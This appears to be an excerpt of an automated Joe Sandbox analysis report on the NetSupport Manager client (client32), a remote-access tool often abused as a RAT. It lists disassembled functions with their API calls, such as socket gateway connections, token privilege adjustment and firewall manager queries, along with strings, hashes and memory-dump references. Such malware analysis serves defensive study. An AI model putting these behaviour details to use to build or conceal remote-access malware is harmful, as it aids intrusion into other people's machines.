Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$ErrorLast$BlockingHookLeave$Unhookclosesocket$Entergetsockname$CountExchangeInitializeInterlockedTick_memsetbindhtonsinet_ntoasocket
String ID: *TcpNoDelay$Cannot connect to gateway %s via web proxy, error %d$Cannot connect to gateway %s, error %d$Connect error to %s using hijacked socket, error %d
API String ID: 692187944-2561115898
Opcode ID: 37abcc1c667ad5a8f0cbb168f998e27418a705a53765b6bd562fb0a55820cd1c
Instruction ID: fde7163114f4eb6db2a1c431a7e656df8dbe8930e27c02b33fc16c255d3aadf8
Opcode Fuzzy Hash: 37abcc1c667ad5a8f0cbb168f998e27418a705a53765b6bd562fb0a55820cd1c
Instruction Fuzzy Hash: 52E1A675A402199FDB14DF58DC80BADB7B5FF88314F4041AAE91AA7280EB719E84CF51

Function 68C691F0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 97sleepnetworkCOMMON

Download Yara Rule

APIs

#16.WSOCK32(00000000,009686C7,68C73361,00000000,00000000,68C73361,00000007), ref: 68C6924C
WSAGetLastError.WSOCK32(00000000,009686C7,68C73361,00000000,00000000,68C73361,00000007), ref: 68C6925B
GetTickCount.KERNEL32 ref: 68C69274
Sleep.KERNEL32(00000001,00000000,009686C7,68C73361,00000000,00000000,68C73361,00000007), ref: 68C692A8
GetTickCount.KERNEL32 ref: 68C692B0
Sleep.KERNEL32(00000014), ref: 68C692BC

Strings

ReadSocket - Connection has been closed by peer, xrefs: 68C692E0
*RecvTimeout, xrefs: 68C6927B
e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 68C69226
ReadSocket - Error %d reading response, xrefs: 68C692F7
ReadSocket - Would block, xrefs: 68C6928A
hbuf->buflen - hbuf->datalen >= min_bytes_to_read, xrefs: 68C6922B

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: CountSleepTick$ErrorLast
String ID: *RecvTimeout$ReadSocket - Connection has been closed by peer$ReadSocket - Error %d reading response$ReadSocket - Would block$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$hbuf->buflen - hbuf->datalen >= min_bytes_to_read
API String ID: 2495545493-2497412063
Opcode ID: 94eebba6b90adc4bcdb83254a09eb96041366d3d23eed2ee8995686f139ca0e0
Instruction ID: 62ad18fd8e61fe9d924d2b31931605d9cfb6dbda9aab1f870917c395a1a52a85
Opcode Fuzzy Hash: 94eebba6b90adc4bcdb83254a09eb96041366d3d23eed2ee8995686f139ca0e0
Instruction Fuzzy Hash: 0831C279E80208EFDB00DFB9E9C4B9EB7F4EB45334F80446AE919D7140F73199888691

Function 68C73130 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 178timethreadCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,?,?,9735354D,21B321B5,973534B3,FFFFFFFF,00000000), ref: 68C731E2
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,68C9ECB0), ref: 68C731EC
GetSystemTime.KERNEL32(?,21B321B5,973534B3,FFFFFFFF,00000000), ref: 68C7322A
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,68C9ECB0), ref: 68C73234
EnterCriticalSection.KERNEL32(68CAB898,?,9735354D), ref: 68C732BE
LeaveCriticalSection.KERNEL32(68CAB898,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 68C732D3
GetCurrentThreadId.KERNEL32 ref: 68C7334D

Part of subcall function 68C7BA20: __strdup.LIBCMT ref: 68C7BA3A

Part of subcall function 68C7BB00: _free.LIBCMT ref: 68C7BB2D

Strings

1.1, xrefs: 68C73240, 68C7324A
ACK=1, xrefs: 68C73312
INFO=1, xrefs: 68C73304
CMD=POLL, xrefs: 68C732F4

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: Time$System$CriticalFileSection$CurrentEnterLeaveThread__strdup_free
String ID: 1.1$ACK=1$CMD=POLL$INFO=1
API String ID: 1510130979-3441452530
Opcode ID: 4837f3596427656e984cf0c9917235b651380f74d276bfc7089ff2e223b13f4f
Instruction ID: b2268f8134fdef3463b81340bed907787b7ca7d0aced3d0a70c193492b4cdfcd
Opcode Fuzzy Hash: 4837f3596427656e984cf0c9917235b651380f74d276bfc7089ff2e223b13f4f
Instruction Fuzzy Hash: FA615E76904209EFCB24DFA4D884EEEB7B9FF49314F80851EE516A7241FB34A504CBA5

Function 11095C90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 58comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 11095CA4
CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,11134B2B), ref: 11095CBE
CoCreateInstance.OLE32(?,00000000,00000001,111BBFCC,?,?,?,?,?,?,?,11134B2B), ref: 11095CDB
CoUninitialize.OLE32(?,?,?,?,?,?,11134B2B), ref: 11095CF9

Strings

HNetCfg.FwMgr, xrefs: 11095CB9
ICF Present: , xrefs: 11095D00

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateFromInitializeInstanceProgUninitialize
String ID: HNetCfg.FwMgr$ICF Present:
API String ID: 3222248624-258972079
Opcode ID: a191ec028fc1ebe43799a3fbc6b5824768ffae445ee9dba88daea3a8dfe179cf
Instruction ID: 667ad4978e11a958ff0dee1adaae51f217c5ac115a2c6bb433f56a1af31716a4
Opcode Fuzzy Hash: a191ec028fc1ebe43799a3fbc6b5824768ffae445ee9dba88daea3a8dfe179cf
Instruction Fuzzy Hash: E011C2B0F0112D5FDB01DBE68C94AAFFB69AF04704F108569EA09D7244E722EE40C7E2

Function 11072460 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 314COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 11072590
_memset.LIBCMT ref: 11072709

Strings

_License, xrefs: 11072551
NBCTL32.DLL, xrefs: 11072645
serial_no, xrefs: 1107254C

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memset
String ID: NBCTL32.DLL$_License$serial_no
API String ID: 2102423945-35127696
Opcode ID: 73eab7b1c8d7b6e70f1aa5dd4ab6e6844c03489425f04d6019e1d2487717588b
Instruction ID: d0e0b9ecbde65a2366102896099e84d523940e720fd040d90542ba2888ebc4af
Opcode Fuzzy Hash: 73eab7b1c8d7b6e70f1aa5dd4ab6e6844c03489425f04d6019e1d2487717588b
Instruction Fuzzy Hash: CAB1A075E00219AFEB04CF98DC91FAEB7F5FF88304F148169E9599B295DB70A901CB90

Function 11030B10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 40COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(1102DF30,?,00000000), ref: 11030B34

Strings

NSMWClass, xrefs: 11030B3F
Client32, xrefs: 11030B14
NSMWClass, xrefs: 11030B53

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID: Client32$NSMWClass$NSMWClass
API String ID: 3192549508-611217420
Opcode ID: 58515847b78de4ae681c1499d6e223a9096c2b5aadf525ec481539d2362be3c4
Instruction ID: 7da52f349ca3cb7d8c11f8ab613c71e219a3e37bd0be996a8dda4c31b38bef83
Opcode Fuzzy Hash: 58515847b78de4ae681c1499d6e223a9096c2b5aadf525ec481539d2362be3c4
Instruction Fuzzy Hash: 9901D674E0132EDFD346DFE4C8859AAFBB5EB8571CB148479D82887308FA71A904CB91

Function 1109DC20 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,774CF550,?,00000000), ref: 1109DC58
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109DC74
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,006A1080,006A1080,006A1080,006A1080,006A1080,006A1080,006A1080,111EAB1C,?,00000001,00000001), ref: 1109DCA0
EqualSid.ADVAPI32(?,006A1080,?,00000001,00000001), ref: 1109DCB3

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InformationToken$AllocateEqualInitialize
String ID:
API String ID: 1878589025-0
Opcode ID: e1ef01c0b2a593c632c16c9fc194400e1d79a88dd1ec3329169a1e99986687c3
Instruction ID: 4e420e32a86b216a8c4820a584475d55105e440134d2483d273bcb85c3c049ac
Opcode Fuzzy Hash: e1ef01c0b2a593c632c16c9fc194400e1d79a88dd1ec3329169a1e99986687c3
Instruction Fuzzy Hash: A1214F71B4122EAFEB00DBA5DC91FBFF7B9EF44744F004069E915D7280E6B1A9018791

Function 1109C750 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(000F01FF,?,1102FAC3,00000000,00000000,00080000,62C07B5E,00080000,00000000,00000000), ref: 1109C77D
OpenProcessToken.ADVAPI32(00000000), ref: 1109C784
LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109C795
AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109C7B9

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 2349140579-0
Opcode ID: fed7014fb2c6176395dd00bdbf9b6dacad7388df0a8d1a1889bfa0ec87585418
Instruction ID: 79ef21a039d637d1c16a726e2430049afe469fda3395ab205b54f21d4569a753
Opcode Fuzzy Hash: fed7014fb2c6176395dd00bdbf9b6dacad7388df0a8d1a1889bfa0ec87585418
Instruction Fuzzy Hash: 7B014071600219AFD710DF94CC89BAEF7BCEB44705F108469EA05D7240D7B06904CB61

Function 1109C7E0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109DB20,00000244,cant create events), ref: 1109C7FC
CloseHandle.KERNEL32(?,00000000,1109DB20,00000244,cant create events), ref: 1109C805

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 07b6c080e2ef9d1b524653a43e28c47792f2e6050ec9e1d6ef6176c43a5e0348
Instruction ID: 2330733e60bf6a127bb8479b673e73a50ba3166191bfb56ce9f8e109ae2e049c
Opcode Fuzzy Hash: 07b6c080e2ef9d1b524653a43e28c47792f2e6050ec9e1d6ef6176c43a5e0348
Instruction Fuzzy Hash: 09E0EC71A00611ABE738CE249D95FA777ECAF08B11F21496DF956E6180CAA0E8448B64

Function 1102E15E Relevance: 209.8, APIs: 31, Strings: 88, Instructions: 1502COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00002000), ref: 1102E234
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102E266

Strings

istaUI, xrefs: 1102E166
EnableSmartcardAuth, xrefs: 1102F93B
DisableHelp, xrefs: 1102ED94
Info. Client running as user=%s, type=%d, xrefs: 1102E492
226546, xrefs: 1102F5ED, 1102F687, 1102F764
Global\NSMWClassAdmin, xrefs: 1102F9FA
Windows 95, xrefs: 1102EF29
DisableJoinClass, xrefs: 1102EC4E, 1102ECEC
LSPloaded=%d, WFPloaded=%d, xrefs: 1102EA2A
TCPIP, xrefs: 1102FB03
NSMWControl32, xrefs: 1102FB52
General, xrefs: 1102E998, 1102EA6F, 1102EDDE, 1102EE11
win8ui, xrefs: 1102E858
View, xrefs: 1102E545, 1102E945, 1102E95C, 1102E97D
CLIENT32.CPP, xrefs: 1102E27A, 1102E80B
s, xrefs: 1102E3A8
*StartupDelay, xrefs: 1102F48B
V12.10.4, xrefs: 1102F3F3, 1102F427
ScreenScrape, xrefs: 1102EB8F, 1102EBB9, 1102EBE3
DisableJournalMenu, xrefs: 1102ECAE, 1102ED4C
MiniDumpType, xrefs: 1102E9B1
NSTWControl32, xrefs: 1102FBAA
NeedsReinstall, xrefs: 1102EA43
V12.00.4, xrefs: 1102F3EC
u.j, xrefs: 1102EE2F
Error. Wrong hardware. Terminating, xrefs: 1102E759
DisableConsoleClient, xrefs: 1102EAA0, 1102EB35
Error. Could not load transports - perhaps another client is running, xrefs: 1102F6C3
WRh, xrefs: 1102E349
NSMWClassVista, xrefs: 1102E1E5
*ScreenScrape, xrefs: 1102F531, 1102F57A, 1102F7AC
UseIPC, xrefs: 1102FA2C
Windows Ding.wav, xrefs: 1102EE41
DisableRequestHelp, xrefs: 1102EC7E, 1102ED1C
closed ok, xrefs: 1102E4CE
DisableAudioFilter, xrefs: 1102EB09, 1102EEE1
_debug, xrefs: 1102F46E
IsILS returned %d, isvistaservice %d, xrefs: 1102E72A
Windows XP Ding.wav, xrefs: 1102EE48
Bridge, xrefs: 1102E52D
AlwaysOnTop, xrefs: 1102F7EF
NSSWControl32, xrefs: 1102FB81
*BeepSound, xrefs: 1102EE0C
NoFTWhenLoggedOff, xrefs: 1102ED7C
Info. Trying to close client, xrefs: 1102E4A4
WRh, xrefs: 1102E2F4
*PriorityClass, xrefs: 1102F7C8
NSM.LIC, xrefs: 1102E56D, 1102E60B
AssertTimeout, xrefs: 1102E993
Session shutting down, exiting..., xrefs: 1102E23E
DisableRunplugin, xrefs: 1102EB77
_debug, xrefs: 1102E85D, 1102E9B6, 1102FA64
hClientRunning = %x, pid=%d (x%x), xrefs: 1102E51A
jj, xrefs: 1102F4E2
WPh, xrefs: 1102E325
jj, xrefs: 1102F4FE
Client, xrefs: 1102E539, 1102EA48, 1102EAD5, 1102EAF6, 1102EB64, 1102EB7C, 1102EB94, 1102EBBE, 1102EBE8, 1102EC1E, 1102EC53, 1102EC6B, 1102EC83, 1102EC9B, 1102ECB3, 1102ECCB, 1102ECF1, 1102ED09, 1102ED21, 1102ED39, 1102ED51, 1102ED69, 1102ED81, 1102ED99, 1102EEAA, 1102F490, 1102F536, 1102F57F, 1102F75A, 1102F7B1, 1102F7CD, 1102F7F4, 1102F904, 1102F91F, 1102F940, 1102FA31
RestartAfterError, xrefs: 1102EA6A
DisableReplayMenu, xrefs: 1102EC66, 1102ED04
ShowKBEnable, xrefs: 1102EC19
DisableJournal, xrefs: 1102EC96, 1102ED34
UseLegacyPrintCapture, xrefs: 1102EEA5
Ready, xrefs: 1102FBC1
jjjj, xrefs: 1102F80A
NSA.LIC, xrefs: 1102E57B, 1102E582, 1102E5A5
Info. Client already running, pid=%d (x%x), xrefs: 1102E43F
DisableAudio, xrefs: 1102EAD0, 1102EAF1, 1102EB5F, 1102ECC6, 1102ED64
\, xrefs: 1102E2BF
*ListenPort, xrefs: 1102FAFE
*BeepUsingSpeaker, xrefs: 1102EDD9
Error x%x reading nsm.lic, sesh=%d, xrefs: 1102E5D6
client32, xrefs: 1102E655, 1102E7F2
UseNTSecurity, xrefs: 1102F91A
NSMWClass, xrefs: 1102E1F6, 1102E3D7, 1102E4E4, 1102F9EF
DisableTSAdmin, xrefs: 1102EAB8
EnableGradientCaptions, xrefs: 1102E940, 1102E957, 1102E978
t&h, xrefs: 1102E22D
RWh, xrefs: 1102E452
|#j, xrefs: 1102EE9F
TraceIPC, xrefs: 1102FA5F
pcicl32, xrefs: 1102E3C4
Audio, xrefs: 1102EB0E, 1102EEE6
|, xrefs: 1102E2DF
TracePriv, xrefs: 1102F469
EnableSmartcardLogon, xrefs: 1102F8FF
Intel error "%s", xrefs: 1102E7B8
gClient.hNotifyEvent, xrefs: 1102E27F
Default, xrefs: 1102FB4B, 1102FB7A, 1102FBA3

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

